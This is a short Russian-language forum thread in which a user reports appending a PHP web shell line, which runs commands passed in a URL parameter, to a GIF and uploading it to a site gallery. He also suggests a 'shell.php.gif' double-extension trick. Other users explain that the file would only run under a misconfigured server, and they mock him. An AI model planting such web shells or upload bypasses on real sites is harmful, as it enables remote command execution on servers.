Уязвимость - шелл

Печать RSS
266

Автор
Дух
0
нечего взламывать не хотел, просто проверил, по этому тут рассказываю

открыл я файл test.gif блокнотом и добавил в самый конец :
<?php system($_GET["cmd"]); ?>
залил картинку на сайт тут: http://visavi.net/gallery/?
- http://visavi.net/gallery/index.php?act=showimg&gid=675&start=0&
можно еще такое на аватаре проверить.

может это уязвимость? может надо что бы сайт фильтровал бы содержимое картинки, или аватара ???

ツ ツ ツ
0
Не уязвимомоть это и проверку делать нет смысла, всеравно не чем это не грозит, просто банан таким выдавать кто гадит в галерее, а картинку я снес т.к увидел её раньше чем эту тему
N

Голубые штаны
0
С каких пор gif как php выполняется? Руки оторвать за такие настройки сервера

Господин ПЖ
0
я ничего не понял, что было-то?

Голубые штаны
0
нету там уязвимости... вот аватар мой например)
<?php echo "Hello world"; ?> написал и пофигу

Добавлено через 00:51 сек.
4: Vantuz, внешне, прозрачная картинка была
J

Оранжевые штаны
0
1. Askme, работать не бут, пока в httacess не пропиш чеб картинку исполняло как пхп скрипт
Автор
Дух
0
Абабагаламага. да, может картинка исполняет, а если например обойти расширение. shell.php.gif ???
А

Оранжевые штаны
0
8, лучше гугл сломай.
K

Транклюкаторщик
0
кулхацкер ))
Автор
Дух
0
Стикеры / Теги / Правила / Топ тем / Топ постов / Поиск